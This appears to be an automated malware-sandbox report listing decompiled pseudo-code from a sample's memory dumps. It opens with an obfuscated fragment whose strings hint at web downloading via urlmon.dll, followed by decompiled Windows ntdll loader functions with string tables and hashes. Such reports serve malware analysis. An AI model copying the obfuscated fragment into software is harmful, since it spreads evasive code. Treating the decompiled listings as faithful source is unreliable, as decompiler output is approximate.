                                  						__edi = 0xf5f30346;
                                  						__esi = __ebx;
                                  						asm("retf");
                                  						_t8 = __eax;
                                  						__eax = __ecx;
                                  						__ecx = _t8;
                                  						asm("int3");
                                  						L7:
                                  						asm("out 0x73, al");
                                  						L8:
                                  						while(__eflags > 0) {
                                  							__eflags = __eax & 0x9372fc31;
                                  							_t11 = __eax;
                                  							__eax = __edx;
                                  							__edx = _t11;
                                  							__bh = __bh +  *((intOrPtr*)(__edx + 0x1dbec823));
                                  							__eflags = __bh;
                                  							__esp = __esp + 1;
                                  							_push(ds);
                                  							asm("adc [esi], cl");
                                  							_push(__ecx);
                                  							_push(__ecx);
                                  							asm("sti");
                                  							asm("faddp st1, st0");
                                  							if(__eflags > 0) {
                                  								continue;
                                  							} else {
                                  								L10:
                                  								goto L0;
                                  							}
                                  							goto L23;
                                  						}
                                  						_t1 = __ebp - 0x73;
                                  						 *_t1 =  *(__ebp - 0x73) << 0x56;
                                  						__eflags =  *_t1;
                                  					}
                                  					L23:
                                  				}
                                  				L15:
                                  				asm("ror byte [ebx], cl");
                                  				_t26 = __edi;
                                  				_t48 = __eax;
                                  				_t16 = _t61 + 0x7f6cb721;
                                  				 *_t16 =  *(_t61 + 0x7f6cb721) + __ecx;
                                  				__eflags =  *_t16;
                                  				goto L16;
                                  			}













                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Us$: $er-A$gent$urlmon.dll
                                  • API String ID: 0-1367105278
                                  • Opcode ID: a6a268fcff0022dcd6bbb2e67d09aca66b1db5f4ffe4c1056632d4187e793186
                                  • Instruction ID: feac6a233371933784746111ca5c46658fd243908eca285433ab50e9c318133f
                                  • Opcode Fuzzy Hash: a6a268fcff0022dcd6bbb2e67d09aca66b1db5f4ffe4c1056632d4187e793186
                                  • Instruction Fuzzy Hash: 1C317A36949B949EDB129E919841BEEBF35DF92714F04008BD4406F281C3685E82C79A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E019E8E00(void* __ecx) {
                                  				signed int _v8;
                                  				char _v12;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				intOrPtr* _t32;
                                  				intOrPtr _t35;
                                  				intOrPtr _t43;
                                  				void* _t46;
                                  				intOrPtr _t47;
                                  				void* _t48;
                                  				signed int _t49;
                                  				void* _t50;
                                  				intOrPtr* _t51;
                                  				signed int _t52;
                                  				void* _t53;
                                  				intOrPtr _t55;
                                  
                                  				_v8 =  *0x1aad360 ^ _t52;
                                  				_t49 = 0;
                                  				_t48 = __ecx;
                                  				_t55 =  *0x1aa8464; // 0x75150110
                                  				if(_t55 == 0) {
                                  					L9:
                                  					if( !_t49 >= 0) {
                                  						if(( *0x1aa5780 & 0x00000003) != 0) {
                                  							E01A35510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                  						}
                                  						if(( *0x1aa5780 & 0x00000010) != 0) {
                                  							asm("int3");
                                  						}
                                  					}
                                  					return E019FB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                  				}
                                  				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                  				_t43 =  *0x1aa7984; // 0x1552b50
                                  				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                  					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                  					if(_t48 == _t43) {
                                  						_t50 = 0x5c;
                                  						if( *_t32 == _t50) {
                                  							_t46 = 0x3f;
                                  							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                  								_t32 = _t32 + 8;
                                  							}
                                  						}
                                  					}
                                  					_t51 =  *0x1aa8464; // 0x75150110
                                  					 *0x1aab1e0(_t47, _t32,  &_v12);
                                  					_t49 =  *_t51();
                                  					if(_t49 >= 0) {
                                  						L8:
                                  						_t35 = _v12;
                                  						if(_t35 != 0) {
                                  							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                  								E019E9B10( *((intOrPtr*)(_t48 + 0x48)));
                                  								_t35 = _v12;
                                  							}
                                  							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                  						}
                                  						goto L9;
                                  					}
                                  					if(_t49 != 0xc000008a) {
                                  						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                  							if(_t49 != 0xc00000bb) {
                                  								goto L8;
                                  							}
                                  						}
                                  					}
                                  					if(( *0x1aa5780 & 0x00000005) != 0) {
                                  						_push(_t49);
                                  						E01A35510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                  						_t53 = _t53 + 0x1c;
                                  					}
                                  					_t49 = 0;
                                  					goto L8;
                                  				} else {
                                  					goto L9;
                                  				}
                                  			}





















                                  Strings
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 01A2932A
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01A2933B, 01A29367
                                  • LdrpFindDllActivationContext, xrefs: 01A29331, 01A2935D
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 01A29357
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 0-3779518884
                                  • Opcode ID: 25c3626c7ebb7d175b8e1dda973dbe4f893e1601e371a5f59d3f91316111aa41
                                  • Instruction ID: 906661d8e439aeb6ea85f0e7e051b5bf1332469f2644b794ca92ec3e52d55248
                                  • Opcode Fuzzy Hash: 25c3626c7ebb7d175b8e1dda973dbe4f893e1601e371a5f59d3f91316111aa41
                                  • Instruction Fuzzy Hash: 7B41F732E003169FDF37BADDC84CA76B6E8AB41656F49456DE90C57151E7707D808382
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 83%
                                  			E019C8794(void* __ecx) {
                                  				signed int _v0;
                                  				char _v8;
                                  				signed int _v12;
                                  				void* _v16;
                                  				signed int _v20;
                                  				intOrPtr _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				signed int _v40;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr* _t77;
                                  				signed int _t80;
                                  				signed char _t81;
                                  				signed int _t87;
                                  				signed int _t91;
                                  				void* _t92;
                                  				void* _t94;
                                  				signed int _t95;
                                  				signed int _t103;
                                  				signed int _t105;
                                  				signed int _t110;
                                  				signed int _t118;
                                  				intOrPtr* _t121;
                                  				intOrPtr _t122;
                                  				signed int _t125;
                                  				signed int _t129;
                                  				signed int _t131;
                                  				signed int _t134;
                                  				signed int _t136;
                                  				signed int _t143;
                                  				signed int* _t147;
                                  				signed int _t151;
                                  				void* _t153;
                                  				signed int* _t157;
                                  				signed int _t159;
                                  				signed int _t161;
                                  				signed int _t166;
                                  				signed int _t168;
                                  
                                  				_push(__ecx);
                                  				_t153 = __ecx;
                                  				_t159 = 0;
                                  				_t121 = __ecx + 0x3c;
                                  				if( *_t121 == 0) {
                                  					L2:
                                  					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                  					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                  						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                  						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                  						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                  							L6:
                                  							if(E019C934A() != 0) {
                                  								_t159 = E01A3A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                  								__eflags = _t159;
                                  								if(_t159 < 0) {
                                  									_t81 =  *0x1aa5780; // 0x0
                                  									__eflags = _t81 & 0x00000003;
                                  									if((_t81 & 0x00000003) != 0) {
                                  										_push(_t159);
                                  										E01A35510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                  										_t81 =  *0x1aa5780; // 0x0
                                  									}
                                  									__eflags = _t81 & 0x00000010;
                                  									if((_t81 & 0x00000010) != 0) {
                                  										asm("int3");
                                  									}
                                  								}
                                  							}
                                  						} else {
                                  							_t159 = E019C849B(0, _t122, _t153, _t159, _t180);
                                  							if(_t159 >= 0) {
                                  								goto L6;
                                  							}
                                  						}
                                  						_t80 = _t159;
                                  						goto L8;
                                  					} else {
                                  						_t125 = 0x13;
                                  						asm("int 0x29");
                                  						_push(0);
                                  						_push(_t159);
                                  						_t161 = _t125;
                                  						_t87 =  *( *[fs:0x30] + 0x1e8);
                                  						_t143 = 0;
                                  						_v40 = _t161;
                                  						_t118 = 0;
                                  						_push(_t153);
                                  						__eflags = _t87;
                                  						if(_t87 != 0) {
                                  							_t118 = _t87 + 0x5d8;
                                  							__eflags = _t118;
                                  							if(_t118 == 0) {
                                  								L46:
                                  								_t118 = 0;
                                  							} else {
                                  								__eflags =  *(_t118 + 0x30);
                                  								if( *(_t118 + 0x30) == 0) {
                                  									goto L46;
                                  								}
                                  							}
                                  						}
                                  						_v32 = 0;
                                  						_v28 = 0;
                                  						_v16 = 0;
                                  						_v20 = 0;
                                  						_v12 = 0;
                                  						__eflags = _t118;
                                  						if(_t118 != 0) {
                                  							__eflags = _t161;
                                  							if(_t161 != 0) {
                                  								__eflags =  *(_t118 + 8);
                                  								if( *(_t118 + 8) == 0) {
                                  									L22:
                                  									_t143 = 1;
                                  									__eflags = 1;
                                  								} else {
                                  									_t19 = _t118 + 0x40; // 0x40
                                  									_t156 = _t19;
                                  									E019C8999(_t19,  &_v16);
                                  									__eflags = _v0;
                                  									if(_v0 != 0) {
                                  										__eflags = _v0 - 1;
                                  										if(_v0 != 1) {
                                  											goto L22;
                                  										} else {
                                  											_t128 =  *(_t161 + 0x64);
                                  											__eflags =  *(_t161 + 0x64);
                                  											if( *(_t161 + 0x64) == 0) {
                                  												goto L22;
                                  											} else {
                                  												E019C8999(_t128,  &_v12);
                                  												_t147 = _v12;
                                  												_t91 = 0;
                                  												__eflags = 0;
                                  												_t129 =  *_t147;
                                  												while(1) {
                                  													__eflags =  *((intOrPtr*)(0x1aa5c60 + _t91 * 8)) - _t129;
                                  													if( *((intOrPtr*)(0x1aa5c60 + _t91 * 8)) == _t129) {
                                  														break;
                                  													}
                                  													_t91 = _t91 + 1;
                                  													__eflags = _t91 - 5;
                                  													if(_t91 < 5) {
                                  														continue;
                                  													} else {
                                  														_t131 = 0;
                                  														__eflags = 0;
                                  													}
                                  													L37:
                                  													__eflags = _t131;
                                  													if(_t131 != 0) {
                                  														goto L22;
                                  													} else {
                                  														__eflags = _v16 - _t147;
                                  														if(_v16 != _t147) {
                                  															goto L22;
                                  														} else {
                                  															E019D2280(_t92, 0x1aa86cc);
                                  															_t94 = E01A89DFB( &_v20);
                                  															__eflags = _t94 - 1;
                                  															if(_t94 != 1) {
                                  															}
                                  															asm("movsd");
                                  															asm("movsd");
                                  															asm("movsd");
                                  															asm("movsd");
                                  															 *_t118 =  *_t118 + 1;
                                  															asm("adc dword [ebx+0x4], 0x0");
                                  															_t95 = E019E61A0( &_v32);
                                  															__eflags = _t95;
                                  															if(_t95 != 0) {
                                  																__eflags = _v32 | _v28;
                                  																if((_v32 | _v28) != 0) {
                                  																	_t71 = _t118 + 0x40; // 0x3f
                                  																	_t134 = _t71;
                                  																	goto L55;
                                  																}
                                  															}
                                  															goto L30;
                                  														}
                                  													}
                                  													goto L56;
                                  												}
                                  												_t92 = 0x1aa5c64 + _t91 * 8;
                                  												asm("lock xadd [eax], ecx");
                                  												_t131 = (_t129 | 0xffffffff) - 1;
                                  												goto L37;
                                  											}
                                  										}
                                  										goto L56;
                                  									} else {
                                  										_t143 = E019C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                  										__eflags = _t143;
                                  										if(_t143 != 0) {
                                  											_t157 = _v12;
                                  											_t103 = 0;
                                  											__eflags = 0;
                                  											_t136 =  &(_t157[1]);
                                  											 *(_t161 + 0x64) = _t136;
                                  											_t151 =  *_t157;
                                  											_v20 = _t136;
                                  											while(1) {
                                  												__eflags =  *((intOrPtr*)(0x1aa5c60 + _t103 * 8)) - _t151;
                                  												if( *((intOrPtr*)(0x1aa5c60 + _t103 * 8)) == _t151) {
                                  													break;
                                  												}
                                  												_t103 = _t103 + 1;
                                  												__eflags = _t103 - 5;
                                  												if(_t103 < 5) {
                                  													continue;
                                  												}
                                  												L21:
                                  												_t105 = E019FF380(_t136, 0x1991184, 0x10);
                                  												__eflags = _t105;
                                  												if(_t105 != 0) {
                                  													__eflags =  *_t157 -  *_v16;
                                  													if( *_t157 >=  *_v16) {
                                  														goto L22;
                                  													} else {
                                  														asm("cdq");
                                  														_t166 = _t157[5] & 0x0000ffff;
                                  														_t108 = _t157[5] & 0x0000ffff;
                                  														asm("cdq");
                                  														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                  														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                  														if(__eflags > 0) {
                                  															L29:
                                  															E019D2280(_t108, 0x1aa86cc);
                                  															 *_t118 =  *_t118 + 1;
                                  															_t42 = _t118 + 0x40; // 0x3f
                                  															_t156 = _t42;
                                  															asm("adc dword [ebx+0x4], 0x0");
                                  															asm("movsd");
                                  															asm("movsd");
                                  															asm("movsd");
                                  															asm("movsd");
                                  															_t110 = E019E61A0( &_v32);
                                  															__eflags = _t110;
                                  															if(_t110 != 0) {
                                  																__eflags = _v32 | _v28;
                                  																if((_v32 | _v28) != 0) {
                                  																	_t134 = _v20;
                                  																	L55:
                                  																	E01A89D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                  																}
                                  															}
                                  															L30:
                                  															 *_t118 =  *_t118 + 1;
                                  															asm("adc dword [ebx+0x4], 0x0");
                                  															E019CFFB0(_t118, _t156, 0x1aa86cc);
                                  															goto L22;
                                  														} else {
                                  															if(__eflags < 0) {
                                  																goto L22;
                                  															} else {
                                  																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                  																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                  																	goto L22;
                                  																} else {
                                  																	goto L29;
                                  																}
                                  															}
                                  														}
                                  													}
                                  													goto L56;
                                  												}
                                  												goto L22;
                                  											}
                                  											asm("lock inc dword [eax]");
                                  											goto L21;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  						return _t143;
                                  					}
                                  				} else {
                                  					_push( &_v8);
                                  					_push( *((intOrPtr*)(__ecx + 0x50)));
                                  					_push(__ecx + 0x40);
                                  					_push(_t121);
                                  					_push(0xffffffff);
                                  					_t80 = E019F9A00();
                                  					_t159 = _t80;
                                  					if(_t159 < 0) {
                                  						L8:
                                  						return _t80;
                                  					} else {
                                  						goto L2;
                                  					}
                                  				}
                                  				L56:
                                  			}


                                  Strings
                                  • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01A19C18
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01A19C28
                                  • LdrpDoPostSnapWork, xrefs: 01A19C1E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 2994545307-1948996284
                                  • Opcode ID: 7c9decce5b530eadd80d7a0162ed624075bbbaab979e8b94183af14a2ccbb246
                                  • Instruction ID: 3b823d7f2f9296daaaed2db05563c9d0651692f089b6d65d859b575526a4cbfb
                                  • Opcode Fuzzy Hash: 7c9decce5b530eadd80d7a0162ed624075bbbaab979e8b94183af14a2ccbb246
                                  • Instruction Fuzzy Hash: 9B912971A00216EFDF19DF59C880ABBB7B9FF84B15B44406DD989AB641E730ED01CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E019C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                  				char _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				char _v24;
                                  				signed int _t73;
                                  				void* _t77;
                                  				char* _t82;
                                  				char* _t87;
                                  				signed char* _t97;
                                  				signed char _t102;
                                  				intOrPtr _t107;
                                  				signed char* _t108;
                                  				intOrPtr _t112;
                                  				intOrPtr _t124;
                                  				intOrPtr _t125;
                                  				intOrPtr _t126;
                                  
                                  				_t107 = __edx;
                                  				_v12 = __ecx;
                                  				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                  				_t124 = 0;
                                  				_v20 = __edx;
                                  				if(E019CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                  					_t112 = _v8;
                                  				} else {
                                  					_t112 = 0;
                                  					_v8 = 0;
                                  				}
                                  				if(_t112 != 0) {
                                  					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                  						_t124 = 0xc000007b;
                                  						goto L8;
                                  					}
                                  					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                  					 *(_t125 + 0x34) = _t73;
                                  					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                  						goto L3;
                                  					}
                                  					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                  					_t124 = E019BC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                  					if(_t124 < 0) {
                                  						goto L8;
                                  					} else {
                                  						goto L3;
                                  					}
                                  				} else {
                                  					L3:
                                  					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                  						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                  						L8:
                                  						return _t124;
                                  					}
                                  					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                  						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                  							goto L5;
                                  						}
                                  						_t102 =  *0x1aa5780; // 0x0
                                  						if((_t102 & 0x00000003) != 0) {
                                  							E01A35510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                  							_t102 =  *0x1aa5780; // 0x0
                                  						}
                                  						if((_t102 & 0x00000010) != 0) {
                                  							asm("int3");
                                  						}
                                  						_t124 = 0xc0000428;
                                  						goto L8;
                                  					}
                                  					L5:
                                  					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                  						goto L8;
                                  					}
                                  					_t77 = _a4 - 0x40000003;
                                  					if(_t77 == 0 || _t77 == 0x33) {
                                  						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                  						if(E019D7D50() != 0) {
                                  							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  						} else {
                                  							_t82 = 0x7ffe0384;
                                  						}
                                  						_t108 = 0x7ffe0385;
                                  						if( *_t82 != 0) {
                                  							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                  								if(E019D7D50() == 0) {
                                  									_t97 = 0x7ffe0385;
                                  								} else {
                                  									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                  								}
                                  								if(( *_t97 & 0x00000020) != 0) {
                                  									E01A37016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                  								}
                                  							}
                                  						}
                                  						if(_a4 != 0x40000003) {
                                  							L14:
                                  							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                  							if(E019D7D50() != 0) {
                                  								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                  							} else {
                                  								_t87 = 0x7ffe0384;
                                  							}
                                  							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                  								if(E019D7D50() != 0) {
                                  									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                  								}
                                  								if(( *_t108 & 0x00000020) != 0) {
                                  									E01A37016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                  								}
                                  							}
                                  							goto L8;
                                  						} else {
                                  							_v16 = _t125 + 0x24;
                                  							_t124 = E019EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                  							if(_t124 < 0) {
                                  								E019BB1E1(_t124, 0x1490, 0, _v16);
                                  								goto L8;
                                  							}
                                  							goto L14;
                                  						}
                                  					} else {
                                  						goto L8;
                                  					}
                                  				}
                                  			}





















                                  Strings
                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 01A19891
                                  • LdrpCompleteMapModule, xrefs: 01A19898
                                  • minkernel\ntdll\ldrmap.c, xrefs: 01A198A2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                  • API String ID: 0-1676968949
                                  • Opcode ID: c55163f16e6c30976061539f89aa9b97a7afc36060b29c823b0f9c620f7104e6
                                  • Instruction ID: b396bf1b6c607efd82006c76fc0b7d2c81fc1850ea3b5b9c54d71007264c4782
                                  • Opcode Fuzzy Hash: c55163f16e6c30976061539f89aa9b97a7afc36060b29c823b0f9c620f7104e6
                                  • Instruction Fuzzy Hash: 3651F432600746DBEB2ACBADC994B2A7BE4BB41B14F040559E9999B7E1D730FD00CF52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E019BE620(void* __ecx, short* __edx, short* _a4) {
                                  				char _v16;
                                  				char _v20;
                                  				intOrPtr _v24;
                                  				char* _v28;
                                  				char _v32;
                                  				char _v36;
                                  				char _v44;
                                  				signed int _v48;
                                  				intOrPtr _v52;
                                  				void* _v56;
                                  				void* _v60;
                                  				char _v64;
                                  				void* _v68;
                                  				void* _v76;
                                  				void* _v84;
                                  				signed int _t59;
                                  				signed int _t74;
                                  				signed short* _t75;
                                  				signed int _t76;
                                  				signed short* _t78;
                                  				signed int _t83;
                                  				short* _t93;
                                  				signed short* _t94;
                                  				short* _t96;
                                  				void* _t97;
                                  				signed int _t99;
                                  				void* _t101;
                                  				void* _t102;
                                  
                                  				_t80 = __ecx;
                                  				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                  				_t96 = __edx;
                                  				_v44 = __edx;
                                  				_t78 = 0;
                                  				_v56 = 0;
                                  				if(__ecx == 0 || __edx == 0) {
                                  					L28:
                                  					_t97 = 0xc000000d;
                                  				} else {
                                  					_t93 = _a4;
                                  					if(_t93 == 0) {
                                  						goto L28;
                                  					}
                                  					_t78 = E019BF358(__ecx, 0xac);
                                  					if(_t78 == 0) {
                                  						_t97 = 0xc0000017;
                                  						L6:
                                  						if(_v56 != 0) {
                                  							_push(_v56);
                                  							E019F95D0();
                                  						}
                                  						if(_t78 != 0) {
                                  							L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                  						}
                                  						return _t97;
                                  					}
                                  					E019FFA60(_t78, 0, 0x158);
                                  					_v48 = _v48 & 0x00000000;
                                  					_t102 = _t101 + 0xc;
                                  					 *_t96 = 0;
                                  					 *_t93 = 0;
                                  					E019FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                  					_v36 = 0x18;
                                  					_v28 =  &_v44;
                                  					_v64 = 0;
                                  					_push( &_v36);
                                  					_push(0x20019);
                                  					_v32 = 0;
                                  					_push( &_v64);
                                  					_v24 = 0x40;
                                  					_v20 = 0;
                                  					_v16 = 0;
                                  					_t97 = E019F9600();
                                  					if(_t97 < 0) {
                                  						goto L6;
                                  					}
                                  					E019FBB40(0,  &_v36, L"InstallLanguageFallback");
                                  					_push(0);
                                  					_v48 = 4;
                                  					_t97 = L019BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                  					if(_t97 >= 0) {
                                  						if(_v52 != 1) {
                                  							L17:
                                  							_t97 = 0xc0000001;
                                  							goto L6;
                                  						}
                                  						_t59 =  *_t78 & 0x0000ffff;
                                  						_t94 = _t78;
                                  						_t83 = _t59;
                                  						if(_t59 == 0) {
                                  							L19:
                                  							if(_t83 == 0) {
                                  								L23:
                                  								E019FBB40(_t83, _t102 + 0x24, _t78);
                                  								if(L019C43C0( &_v48,  &_v64) == 0) {
                                  									goto L17;
                                  								}
                                  								_t84 = _v48;
                                  								 *_v48 = _v56;
                                  								if( *_t94 != 0) {
                                  									E019FBB40(_t84, _t102 + 0x24, _t94);
                                  									if(L019C43C0( &_v48,  &_v64) != 0) {
                                  										 *_a4 = _v56;
                                  									} else {
                                  										_t97 = 0xc0000001;
                                  										 *_v48 = 0;
                                  									}
                                  								}
                                  								goto L6;
                                  							}
                                  							_t83 = _t83 & 0x0000ffff;
                                  							while(_t83 == 0x20) {
                                  								_t94 =  &(_t94[1]);
                                  								_t74 =  *_t94 & 0x0000ffff;
                                  								_t83 = _t74;
                                  								if(_t74 != 0) {
                                  									continue;
                                  								}
                                  								goto L23;
                                  							}
                                  							goto L23;
                                  						} else {
                                  							goto L14;
                                  						}
                                  						while(1) {
                                  							L14:
                                  							_t27 =  &(_t94[1]); // 0x2
                                  							_t75 = _t27;
                                  							if(_t83 == 0x2c) {
                                  								break;
                                  							}
                                  							_t94 = _t75;
                                  							_t76 =  *_t94 & 0x0000ffff;
                                  							_t83 = _t76;
                                  							if(_t76 != 0) {
                                  								continue;
                                  							}
                                  							goto L23;
                                  						}
                                  						 *_t94 = 0;
                                  						_t94 = _t75;
                                  						_t83 =  *_t75 & 0x0000ffff;
                                  						goto L19;
                                  					}
                                  				}
                                  			}
































                                  Strings
                                  • InstallLanguageFallback, xrefs: 019BE6DB
                                  • @, xrefs: 019BE6C0
                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 019BE68C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                  • API String ID: 0-1757540487
                                  • Opcode ID: fe3486bad6e82dc4b15f3a0e5488187f2c89866ad8ce91fcc22ccdc2945470e0
                                  • Instruction ID: 228ec6917af20ac819e36811fb7f148ce1fe013982f9dec733251103c1709282
                                  • Opcode Fuzzy Hash: fe3486bad6e82dc4b15f3a0e5488187f2c89866ad8ce91fcc22ccdc2945470e0
                                  • Instruction Fuzzy Hash: DD51D476A083069BD714DF68C480AABB7E9BFC9715F05092EFA89D7241F734D904C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 60%
                                  			E01A7E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                  				signed int _v20;
                                  				char _v24;
                                  				signed int _v40;
                                  				char _v44;
                                  				intOrPtr _v48;
                                  				signed int _v52;
                                  				unsigned int _v56;
                                  				char _v60;
                                  				signed int _v64;
                                  				char _v68;
                                  				signed int _v72;
                                  				void* __ebx;
                                  				void* __edi;
                                  				char _t87;
                                  				signed int _t90;
                                  				signed int _t94;
                                  				signed int _t100;
                                  				intOrPtr* _t113;
                                  				signed int _t122;
                                  				void* _t132;
                                  				void* _t135;
                                  				signed int _t139;
                                  				signed int* _t141;
                                  				signed int _t146;
                                  				signed int _t147;
                                  				void* _t153;
                                  				signed int _t155;
                                  				signed int _t159;
                                  				char _t166;
                                  				void* _t172;
                                  				void* _t176;
                                  				signed int _t177;
                                  				intOrPtr* _t179;
                                  
                                  				_t179 = __ecx;
                                  				_v48 = __edx;
                                  				_v68 = 0;
                                  				_v72 = 0;
                                  				_push(__ecx[1]);
                                  				_push( *__ecx);
                                  				_push(0);
                                  				_t153 = 0x14;
                                  				_t135 = _t153;
                                  				_t132 = E01A7BBBB(_t135, _t153);
                                  				if(_t132 == 0) {
                                  					_t166 = _v68;
                                  					goto L43;
                                  				} else {
                                  					_t155 = 0;
                                  					_v52 = 0;
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  					_v56 = __ecx[1];
                                  					if( *__ecx >> 8 < 2) {
                                  						_t155 = 1;
                                  						_v52 = 1;
                                  					}
                                  					_t139 = _a4;
